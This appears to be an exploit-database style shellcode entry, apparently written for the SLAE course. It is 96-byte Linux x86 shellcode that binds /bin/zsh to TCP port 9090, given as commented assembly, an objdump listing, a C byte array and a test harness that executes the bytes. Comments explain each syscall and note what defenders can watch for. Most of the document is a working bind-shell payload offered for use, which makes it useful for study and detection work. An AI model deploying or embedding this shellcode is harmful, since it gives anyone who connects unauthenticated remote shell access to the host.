Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)
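/*
 * Linux x86
 * Author: thryb
 * Date: 13-07-16
 * Purpose: Bind /bin/zsh to TCP port 9090
 * Size: 96 bytes
 * ID: SLAE-770
 * Git: https://www.github.com/thryb/SLAE-770
 *
 * What the payload does, as laid out in the assembly below: socket(AF_INET,
 * SOCK_STREAM, 0); bind(fd, {AF_INET, port 0x2382 = 9090, addr 0}, 16);
 * listen(fd, 1); accept(fd, NULL, NULL); dup2() of the accepted socket onto
 * fds 2, 1, 0; execve("/bin/zsh", ...). The socket calls all go through
 * sys_socketcall (0x66), then sys_dup2 (0x3f) and sys_execve (0xb), each via
 * int 0x80. The port is pushed as the little-endian word 0x8223, i.e. bytes
 * 23 82, which is 9090 in network byte order, and the address word pushed
 * before it is edx == 0 (bind on every interface). The objdump output shows
 * no 0x00 byte anywhere in the 96 bytes, which is why strlen() below
 * reports the full length.
 *
 * Defender's view: the observable footprint is a process that opens a
 * listening TCP socket on 9090, then replaces itself with /bin/zsh whose
 * stdin/stdout/stderr are all the accepted connection — a shell with all
 * three standard streams on a socket is the characteristic artefact to alert
 * on.
 *
 * global _start
 * section .text
 *
 * _start:
 *     xor eax, eax        ; cleaning registers for sanity
 *     xor ebx, ebx
 *     xor edx, edx
 *     xor edi, edi
 *
 *     ; 1 - create socket
 *     ; socket(AF_INET, SOCK_STREAM, 0);
 *     ; #define SYS_SOCKET 1 // sys_socket(2)
 *     push eax            ; null
 *     mov al, 0x66        ; sys_socketcall = 102
 *     mov bl, 0x1         ; socketcall() socket = 1
 *     push byte 0x1       ; stack = 0, 1
 *     push byte 0x2       ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
 *     mov ecx, esp        ; mov stack ptr to ecx
 *     int 0x80            ; init
 *
 *     ; 2 - Bind port
 *     ; bind(fd, (struct sockaddr *) &s_addr, 16);
 *     ; #define SYS_BIND 2 // sys_bind(2)
 *     xchg edi, eax       ; transfer fd to edi
 *     mov al, 0x66        ; sys_socketcall = 102
 *     pop ebx             ; sys_bind = 2
 *     pop esi             ; = 1
 *     push edx            ; stack = [0]
 *     push word 0x8223    ; stack = [0, port_num]
 *     push word bx        ; stack = [0, port_num, 2]
 *     push byte 16        ; stack = [0, port_num, 2], 16
 *     push ecx            ; stack = [0, port_num, 2], 16, pointer
 *     push edi            ; stack = [0, port_num, 2], 16, *ptr, fd
 *     mov ecx, esp        ; move stack ptr to ecx
 *     int 0x80            ; init
 *
 *     ; 3 - Listen
 *     ; listen(fd, 1);
 *     ; #define SYS_LISTEN 4 // sys_listen(2)
 *     pop edx             ; save fd
 *     mov al, 0x66        ; sys_socketcall = 102
 *     add bl, 0x2         ; bl + 2 (bl 2 from bind)
 *     int 0x80            ; init
 *
 *     ; 4 - Accept
 *     ; accept(fd, NULL, NULL);
 *     ; #define SYS_ACCEPT 5 // sys_accept(2)
 *     push eax            ; 0 - NULL
 *     push eax            ; 0 - NULL
 *     mov al, 0x66        ; sys_socketcall = 102
 *     inc ebx             ; make 5 for listen (4 from listen)
 *     push edx            ; push fd on stack
 *     mov ecx, esp        ; move stack ptr to ecx
 *     int 0x80            ; init
 *
 *     ; 5 - dup
 *     ; sys_dup2 = 63 = 0x3f
 *     xchg eax, ebx       ; ebx = fd / eax = 5
 *     xor ecx, ecx        ; NULL ecx
 *     add cl, 0x2         ; add 2 to counter
 * dup2:                   ; STDIN, STDOUT, STDERR
 *     mov al, 0x3f        ; sys_dup2
 *     int 0x80            ; init
 *     dec cl              ; decrement counter
 *     jns dup2            ; Jump on No Sign (Positive)
 *
 *     ; 6 - execve /bin/zsh
 *     ; normal execve shell exec
 *     push eax
 *     push 0x68737a2f     ; hsz/
 *     push 0x6e69622f     ; nib/
 *     mov ebx, esp
 *     push eax
 *     mov edx, esp
 *     push ebx
 *     mov ecx, esp
 *     mov al, 0xb         ; sys_execve (11)
 *     int 0x80            ; init
 *
 * ============================================================================
 * No NULL
 *
 * ./bind-sh-tcp-9090:     file format elf32-i386
 *
 * Disassembly of section .text:
 *
 * 08048060 <_start>:
 *  8048060:   31 c0                   xor    %eax,%eax
 *  8048062:   31 db                   xor    %ebx,%ebx
 *  8048064:   31 d2                   xor    %edx,%edx
 *  8048066:   31 ff                   xor    %edi,%edi
 *  8048068:   50                      push   %eax
 *  8048069:   b0 66                   mov    $0x66,%al
 *  804806b:   b3 01                   mov    $0x1,%bl
 *  804806d:   6a 01                   push   $0x1
 *  804806f:   6a 02                   push   $0x2
 *  8048071:   89 e1                   mov    %esp,%ecx
 *  8048073:   cd 80                   int    $0x80
 *  8048075:   97                      xchg   %eax,%edi
 *  8048076:   b0 66                   mov    $0x66,%al
 *  8048078:   5b                      pop    %ebx
 *  8048079:   5e                      pop    %esi
 *  804807a:   52                      push   %edx
 *  804807b:   66 68 23 82             pushw  $0x8223
 *  804807f:   66 53                   push   %bx
 *  8048081:   6a 10                   push   $0x10
 *  8048083:   51                      push   %ecx
 *  8048084:   57                      push   %edi
 *  8048085:   89 e1                   mov    %esp,%ecx
 *  8048087:   cd 80                   int    $0x80
 *  8048089:   5a                      pop    %edx
 *  804808a:   b0 66                   mov    $0x66,%al
 *  804808c:   80 c3 02                add    $0x2,%bl
 *  804808f:   cd 80                   int    $0x80
 *  8048091:   50                      push   %eax
 *  8048092:   50                      push   %eax
 *  8048093:   b0 66                   mov    $0x66,%al
 *  8048095:   43                      inc    %ebx
 *  8048096:   52                      push   %edx
 *  8048097:   89 e1                   mov    %esp,%ecx
 *  8048099:   cd 80                   int    $0x80
 *  804809b:   93                      xchg   %eax,%ebx
 *  804809c:   31 c9                   xor    %ecx,%ecx
 *  804809e:   80 c1 02                add    $0x2,%cl
 *
 * 080480a1 <dup2>:
 *  80480a1:   b0 3f                   mov    $0x3f,%al
 *  80480a3:   cd 80                   int    $0x80
 *  80480a5:   fe c9                   dec    %cl
 *  80480a7:   79 f8                   jns    80480a1 <dup2>
 *  80480a9:   50                      push   %eax
 *  80480aa:   68 2f 7a 73 68          push   $0x68737a2f
 *  80480af:   68 2f 62 69 6e          push   $0x6e69622f
 *  80480b4:   89 e3                   mov    %esp,%ebx
 *  80480b6:   50                      push   %eax
 *  80480b7:   89 e2                   mov    %esp,%edx
 *  80480b9:   53                      push   %ebx
 *  80480ba:   89 e1                   mov    %esp,%ecx
 *  80480bc:   b0 0b                   mov    $0xb,%al
 *  80480be:   cd 80                   int    $0x80
 */

#include <stdio.h>
#include <string.h>

/*
 * The 96 bytes from the objdump listing above, as a NUL-terminated string.
 * The two bytes between the "Port" markers are the little-endian word 0x8223
 * (network-order 9090) that bind() receives; they are the only
 * configuration in the payload.
 */
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xd2\x31\xff\x50\xb0\x66\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\xb0\x66\x5b\x5e\x52\x66\x68"
// ==== Port ====
"\x23\x82"
// ==============
"\x66\x53\x6a\x10\x51\x57\x89\xe1\xcd\x80\x5a\xb0\x66\x80\xc3\x02\xcd\x80\x50\x50\xb0\x66\x43\x52\x89\xe1\xcd\x80\x93\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

/*
 * Test harness: prints the payload length and then jumps into the data array.
 *
 * Converting an object pointer to a function pointer is not portable C, and
 * on a build where .data is not mapped executable (the usual default with
 * current toolchains and kernels) the indirect call faults instead of running
 * the bytes. Fixes over the original: `main()` with an implicit int return
 * type is invalid since C99, and strlen() returns size_t, so "%d" was a
 * format/argument type mismatch — "%zu" is the matching conversion.
 */
int main(void)
{
    /* strlen() is valid here only because the payload contains no 0x00 byte */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));
    int (*ret)(void) = (int (*)(void))code;
    ret();
    return 0;
}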